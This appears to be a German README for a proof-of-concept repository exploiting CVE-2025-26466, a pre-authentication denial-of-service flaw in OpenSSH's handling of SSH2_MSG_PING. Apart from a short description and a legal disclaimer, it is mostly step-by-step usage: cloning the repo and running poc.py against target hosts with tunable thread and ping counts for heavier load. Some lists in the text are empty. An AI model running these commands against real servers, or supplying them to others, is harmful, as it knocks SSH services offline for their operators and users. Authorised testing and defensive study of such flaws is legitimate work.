
CVE-2025-26466 OpenSSH SSH2_MSG_PING DoS PoC
Disclaimer: Dieser Code ist ausschließlich für pädagogische Zwecke und autorisierte Sicherheitstests bestimmt. Unautorisierte Angriffe auf fremde Systeme sind illegal.
CVE-2025-26466 ist eine Pre-Authentifizierungs-Denial-of-Service (DoS) Schwachstelle in OpenSSH, die es ermöglicht, einen SSH-Server vor Abschluss des Key Exchange zu überlasten.
Der Server akzeptiert SSH2_MSG_PING-Pakete (Message Type 192) bereits während des initialen Handshakes, ohne dass eine authentifizierte Verbindung besteht. Dies führt zu:
# Repository klonen
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# Berechtigung für Ausführung (optional)
chmod +x poc.py
Keine zusätzlichen Dependencies erforderlich (nur Standard-Library).
python3 poc.py 192.168.1.10
python3 poc.py <ziel-host> [port] [threads] [pings]
Parameter:
<ziel-host> - Ziel-IP oder Hostname (erforderlich)[port] - SSH-Port (Standard: 22)[threads] - Anzahl der parallelen Verbindungen (Standard: 10)[pings] - PINGs pro Verbindung (Standard: 500)# Standard: localhost, Port 22, 10 Threads, 500 PINGs
python3 poc.py localhost
# Erhöhte Last: 50 Threads, 1000 PINGs
python3 poc.py 192.168.1.10 22 50 1000
# Custom Port
python3 poc.py example.com 2222 20 800
MIT License - siehe LICENSE für Details
Dieser PoC wird veröffentlicht, da:
Nutze diesen Code nur:
Unautorisierte DoS-Attacken sind strafbar!
Autor: Vollassiliz (voidcall.dev)
Created: 2025-01-29